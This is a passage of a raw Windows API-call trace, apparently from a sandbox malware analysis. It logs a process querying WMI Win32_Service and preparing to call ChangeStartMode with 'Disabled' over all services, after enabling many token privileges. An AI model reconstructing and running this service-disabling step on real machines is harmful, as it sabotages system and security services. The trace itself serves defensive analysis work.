pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.753] lstrlenW (lpString="StopService") returned 11 [0115.753] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.753] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StopService", cchCount2=11) returned 1 [0115.753] IUnknown:Release (This=0x7d7200) returned 0x1 [0115.753] SafeArrayGetElement (in: psa=0x7bf400, rgIndices=0x4feee0, pv=0x4fef14 | out: pv=0x4fef14) returned 0x0 [0115.753] IWbemClassObject:Get (in: This=0x7d7740, wszName="Name", lFlags=0, pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.753] lstrlenW (lpString="PauseService") returned 12 [0115.753] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.753] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="PauseService", cchCount2=12) returned 1 [0115.753] IUnknown:Release (This=0x7d7740) returned 0x1 [0115.753] SafeArrayGetElement (in: psa=0x7bf400, rgIndices=0x4feee0, pv=0x4fef14 | out: pv=0x4fef14) returned 0x0 [0115.753] IWbemClassObject:Get (in: This=0x7d7c80, wszName="Name", lFlags=0, pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.754] lstrlenW (lpString="ResumeService") returned 13 [0115.754] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ResumeService", cchCount2=13) returned 1 [0115.754] IUnknown:Release (This=0x7d7c80) returned 0x1 [0115.754] SafeArrayGetElement (in: psa=0x7bf400, rgIndices=0x4feee0, pv=0x4fef14 | out: pv=0x4fef14) returned 0x0 [0115.754] IWbemClassObject:Get (in: This=0x7d81e8, wszName="Name", lFlags=0, pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.754] lstrlenW (lpString="InterrogateService") returned 18 [0115.754] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="InterrogateService", cchCount2=18) returned 1 [0115.754] IUnknown:Release (This=0x7d81e8) returned 0x1 [0115.754] SafeArrayGetElement (in: psa=0x7bf400, rgIndices=0x4feee0, pv=0x4fef14 | out: pv=0x4fef14) returned 0x0 [0115.754] IWbemClassObject:Get (in: This=0x7d8bf0, wszName="Name", lFlags=0, pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.754] lstrlenW (lpString="UserControlService") returned 18 [0115.754] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="UserControlService", cchCount2=18) returned 1 [0115.754] IUnknown:Release (This=0x7d8bf0) returned 0x1 [0115.754] SafeArrayGetElement (in: psa=0x7bf400, rgIndices=0x4feee0, pv=0x4fef14 | out: pv=0x4fef14) returned 0x0 [0115.754] IWbemClassObject:Get (in: This=0x7dcbf8, wszName="Name", lFlags=0, pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.754] lstrlenW (lpString="Create") returned 6 [0115.754] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Create", cchCount2=6) returned 1 [0115.754] IUnknown:Release (This=0x7dcbf8) returned 0x1 [0115.754] SafeArrayGetElement (in: psa=0x7bf400, rgIndices=0x4feee0, pv=0x4fef14 | out: pv=0x4fef14) returned 0x0 [0115.754] IWbemClassObject:Get (in: This=0x7e08c8, wszName="Name", lFlags=0, pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.755] lstrlenW (lpString="Change") returned 6 [0115.755] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Change", cchCount2=6) returned 3 [0115.755] IUnknown:Release (This=0x7e08c8) returned 0x1 [0115.755] SafeArrayGetElement (in: psa=0x7bf400, rgIndices=0x4feee0, pv=0x4fef14 | out: pv=0x4fef14) returned 0x0 [0115.755] IWbemClassObject:Get (in: This=0x7e1550, wszName="Name", lFlags=0, pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.755] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.755] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ChangeStartMode", cchCount2=15) returned 2 [0115.755] GetCurrentThreadId () returned 0xf40 [0115.755] ??0CHString@@QAE@XZ () returned 0x4fed2c [0115.755] IWbemClassObject:Get (in: This=0x7e1550, wszName="Description", lFlags=0, pVal=0x4fecfc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4fecfc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ChangeStartMode method modifies the StartMode of a service. It returns an integer value of 0 if the service was successfully modified, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.755] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.755] IWbemClassObject:Get (in: This=0x7e1550, wszName="Parameters", lFlags=0, pVal=0x4feea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4feea0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7bf460*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x7b3500, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.755] IWbemClassObject:Get (in: This=0x7e1550, wszName="VerbType", lFlags=0, pVal=0x4fee38*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4fee38*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.755] IWbemClassObject:Get (in: This=0x7e1550, wszName="Derivation", lFlags=0, pVal=0x4fee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4fee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.755] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.756] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.756] SafeArrayGetLBound (in: psa=0x7bf460, nDim=0x1, plLbound=0x4feed4 | out: plLbound=0x4feed4) returned 0x0 [0115.756] SafeArrayGetUBound (in: psa=0x7bf460, nDim=0x1, plUbound=0x4feef0 | out: plUbound=0x4feef0) returned 0x0 [0115.756] SafeArrayGetElement (in: psa=0x7bf460, rgIndices=0x4feef4, pv=0x4fef00 | out: pv=0x4fef00) returned 0x0 [0115.756] IWbemClassObject:Get (in: This=0x7e25e8, wszName="ParaId", lFlags=0, pVal=0x4fee50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4fee50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.756] IWbemClassObject:Get (in: This=0x7e25e8, wszName="Type", lFlags=0, pVal=0x4fede8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4fede8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.756] IWbemClassObject:Get (in: This=0x7e25e8, wszName="Default", lFlags=0, pVal=0x4fee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4fee08*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.756] GetCurrentThreadId () returned 0xf40 [0115.756] ??0CHString@@QAE@XZ () returned 0x4fed3c [0115.756] IWbemClassObject:Get (in: This=0x7e25e8, wszName="Qualifiers", lFlags=0, pVal=0x4fecc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4fecc4*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7bf280*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x7b3560, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.756] SafeArrayGetLBound (in: psa=0x7bf280, nDim=0x1, plLbound=0x4fecf4 | out: plLbound=0x4fecf4) returned 0x0 [0115.756] SafeArrayGetUBound (in: psa=0x7bf280, nDim=0x1, plUbound=0x4fed08 | out: plUbound=0x4fed08) returned 0x0 [0115.756] SafeArrayGetElement (in: psa=0x7bf280, rgIndices=0x4fed14, pv=0x4fed34 | out: pv=0x4fed34) returned 0x0 [0115.756] IWbemClassObject:Get (in: This=0x7e28a0, wszName="Name", lFlags=0, pVal=0x4fecdc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4fecdc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="In", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.756] IWbemClassObject:Get (in: This=0x7e28a0, wszName="QualifierValue", lFlags=0, pVal=0x4fecb4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4fecb4*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7bf3d0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x7b35a0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.756] SafeArrayGetLBound (in: psa=0x7bf3d0, nDim=0x1, plLbound=0x4fecf8 | out: plLbound=0x4fecf8) returned 0x0 [0115.756] SafeArrayGetUBound (in: psa=0x7bf3d0, nDim=0x1, plUbound=0x4fecd8 | out: plUbound=0x4fecd8) returned 0x0 [0115.756] lstrlenW (lpString="CIMTYPE") returned 7 [0115.756] lstrlenW (lpString="In") returned 2 [0115.756] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0115.756] lstrlenW (lpString="read") returned 4 [0115.756] lstrlenW (lpString="In") returned 2 [0115.756] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0115.756] lstrlenW (lpString="write") returned 5 [0115.756] lstrlenW (lpString="In") returned 2 [0115.756] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0115.756] lstrlenW (lpString="In") returned 2 [0115.757] lstrlenW (lpString="In") returned 2 [0115.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0115.757] SafeArrayGetElement (in: psa=0x7bf3d0, rgIndices=0x4fed20, pv=0x4fed28 | out: pv=0x4fed28) returned 0x0 [0115.757] lstrlenW (lpString="true") returned 4 [0115.757] lstrlenW (lpString="True") returned 4 [0115.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0115.757] IUnknown:Release (This=0x7e28a0) returned 0x1 [0115.757] SafeArrayGetElement (in: psa=0x7bf280, rgIndices=0x4fed14, pv=0x4fed34 | out: pv=0x4fed34) returned 0x0 [0115.757] IWbemClassObject:Get (in: This=0x7e2bd8, wszName="Name", lFlags=0, pVal=0x4fecdc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7b25e4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4fecdc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ValueMap", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.757] IWbemClassObject:Get (in: This=0x7e2bd8, wszName="QualifierValue", lFlags=0, pVal=0x4fecb4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7bf3d0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4fecb4*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7befe0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x7b2718, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.757] SafeArrayGetLBound (in: psa=0x7befe0, nDim=0x1, plLbound=0x4fecf8 | out: plLbound=0x4fecf8) returned 0x0 [0115.757] SafeArrayGetUBound (in: psa=0x7befe0, nDim=0x1, plUbound=0x4fecd8 | out: plUbound=0x4fecd8) returned 0x0 [0115.757] lstrlenW (lpString="CIMTYPE") returned 7 [0115.757] lstrlenW (lpString="ValueMap") returned 8 [0115.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="CIMTYPE", cchCount2=7) returned 3 [0115.757] lstrlenW (lpString="read") returned 4 [0115.757] lstrlenW (lpString="ValueMap") returned 8 [0115.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="read", cchCount2=4) returned 3 [0115.757] lstrlenW (lpString="write") returned 5 [0115.757] lstrlenW (lpString="ValueMap") returned 8 [0115.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="write", cchCount2=5) returned 1 [0115.757] lstrlenW (lpString="In") returned 2 [0115.757] lstrlenW (lpString="ValueMap") returned 8 [0115.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="In", cchCount2=2) returned 3 [0115.757] lstrlenW (lpString="Out") returned 3 [0115.757] lstrlenW (lpString="ValueMap") returned 8 [0115.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="Out", cchCount2=3) returned 3 [0115.757] SafeArrayGetElement (in: psa=0x7befe0, rgIndices=0x4fed20, pv=0x4fed28 | out: pv=0x4fed28) returned 0x0 [0115.757] SafeArrayGetElement (in: psa=0x7befe0, rgIndices=0x4fed20, pv=0x4fed28 | out: pv=0x4fed28) returned 0x0 [0115.757] SafeArrayGetElement (in: psa=0x7befe0, rgIndices=0x4fed20, pv=0x4fed28 | out: pv=0x4fed28) returned 0x0 [0115.757] SafeArrayGetElement (in: psa=0x7befe0, rgIndices=0x4fed20, pv=0x4fed28 | out: pv=0x4fed28) returned 0x0 [0115.757] SafeArrayGetElement (in: psa=0x7befe0, rgIndices=0x4fed20, pv=0x4fed28 | out: pv=0x4fed28) returned 0x0 [0115.758] SysStringLen (param_1="ValueMap") returned 0x8 [0115.758] SysStringLen (param_1="In") returned 0x2 [0115.758] SysStringLen (param_1="In") returned 0x2 [0115.758] SysStringLen (param_1="ValueMap") returned 0x8 [0115.758] IUnknown:Release (This=0x7e2bd8) returned 0x1 [0115.758] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.758] IUnknown:Release (This=0x7e25e8) returned 0x1 [0115.758] IUnknown:Release (This=0x7e1550) returned 0x1 [0115.758] IUnknown:Release (This=0x7d5308) returned 0x0 [0115.759] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.759] lstrlenW (lpString="/") returned 1 [0115.759] lstrlenW (lpString="Disabled") returned 8 [0115.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="/", cchCount2=1) returned 3 [0115.759] lstrlenW (lpString="-") returned 1 [0115.759] lstrlenW (lpString="Disabled") returned 8 [0115.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="-", cchCount2=1) returned 3 [0115.759] lstrlenW (lpString="Disabled") returned 8 [0115.759] lstrlenW (lpString="Disabled") returned 8 [0115.759] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0115.759] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0115.759] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x498866f8 | out: _String="Select", _Context=0x498866f8) returned="Select" [0115.759] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x498866f8 | out: _String=0x0, _Context=0x498866f8) returned="*" [0115.759] lstrlenW (lpString="FROM") returned 4 [0115.759] lstrlenW (lpString="*") returned 1 [0115.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0115.760] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x498866f8 | out: _String=0x0, _Context=0x498866f8) returned="from" [0115.760] lstrlenW (lpString="FROM") returned 4 [0115.760] lstrlenW (lpString="from") returned 4 [0115.760] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0115.760] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x498866f8 | out: _String=0x0, _Context=0x498866f8) returned="Win32_Service" [0115.760] lstrlenW (lpString="SET") returned 3 [0115.760] lstrlenW (lpString="CALL") returned 4 [0115.760] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0115.760] lstrlenW (lpString="CREATE") returned 6 [0115.760] lstrlenW (lpString="CALL") returned 4 [0115.760] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0115.760] lstrlenW (lpString="GET") returned 3 [0115.760] lstrlenW (lpString="CALL") returned 4 [0115.760] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0115.760] lstrlenW (lpString="LIST") returned 4 [0115.760] lstrlenW (lpString="CALL") returned 4 [0115.760] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0115.760] lstrlenW (lpString="ASSOC") returned 5 [0115.760] lstrlenW (lpString="CALL") returned 4 [0115.760] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0115.760] WbemLocator:IUnknown:AddRef (This=0x780500) returned 0x3 [0115.760] lstrlenW (lpString="") returned 0 [0115.760] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.760] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0115.760] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.760] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.760] GetCurrentThreadId () returned 0xf40 [0115.760] GetCurrentProcess () returned 0xffffffff [0115.760] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x4ff830 | out: TokenHandle=0x4ff830*=0x270) returned 1 [0115.760] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4ff82c | out: TokenInformation=0x0, ReturnLength=0x4ff82c) returned 0 [0115.760] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x769100, TokenInformationLength=0x118, ReturnLength=0x4ff82c | out: TokenInformation=0x769100, ReturnLength=0x4ff82c) returned 1 [0115.760] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0x769100*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0115.760] CloseHandle (hObject=0x270) returned 1 [0115.760] lstrlenW (lpString="GET") returned 3 [0115.760] lstrlenW (lpString="CALL") returned 4 [0115.760] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0115.760] lstrlenW (lpString="LIST") returned 4 [0115.760] lstrlenW (lpString="CALL") returned 4 [0115.761] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0115.761] lstrlenW (lpString="SET") returned 3 [0115.761] lstrlenW (lpString="CALL") returned 4 [0115.761] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0115.761] lstrlenW (lpString="CALL") returned 4 [0115.761] lstrlenW (lpString="CALL") returned 4 [0115.761] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0115.761] ??0CHString@@QAE@XZ () returned 0x4ff7f0 [0115.761] GetCurrentThreadId () returned 0xf40 [0115.761] SysStringLen (param_1="\\\\") returned 0x2 [0115.761] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0115.761] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0115.761] SysStringLen (param_1="\\") returned 0x1 [0115.761] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0115.761] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0115.761] WbemLocator:IWbemLocator:ConnectServer (in: This=0x780500, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0x7b0ba0) returned 0x0 [0115.767] CoSetProxyBlanket (pProxy=0x7b0ba0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0115.767] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.767] ??0CHString@@QAE@XZ () returned 0x4ff7ec [0115.767] GetCurrentThreadId () returned 0xf40 [0115.767] lstrlenA (lpString="") returned 0 [0115.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x7611a8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0115.767] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0115.767] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0115.767] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x4988681c | out: _String="Select", _Context=0x4988681c) returned="Select" [0115.767] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x4988681c | out: _String=0x0, _Context=0x4988681c) returned="*" [0115.767] lstrlenW (lpString="FROM") returned 4 [0115.767] lstrlenW (lpString="*") returned 1 [0115.767] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0115.768] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x4988681c | out: _String=0x0, _Context=0x4988681c) returned="from" [0115.768] lstrlenW (lpString="FROM") returned 4 [0115.768] lstrlenW (lpString="from") returned 4 [0115.768] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0115.768] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x4988681c | out: _String=0x0, _Context=0x4988681c) returned="Win32_Service" [0115.768] IWbemServices:GetObject (in: This=0x7b0ba0, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x4ff7c4*=0x0, ppCallResult=0x0 | out: ppObject=0x4ff7c4*=0x80adb8, ppCallResult=0x0) returned 0x0 [0115.799] IWbemClassObject:GetMethod (in: This=0x80adb8, wszName="ChangeStartMode", lFlags=0, ppInSignature=0x4ff7d0, ppOutSignature=0x4ff7bc | out: ppInSignature=0x4ff7d0*=0x80b2a8, ppOutSignature=0x4ff7bc*=0x80b628) returned 0x0 [0115.799] IWbemClassObject:SpawnInstance (in: This=0x80b2a8, lFlags=0, ppNewInstance=0x4ff7dc | out: 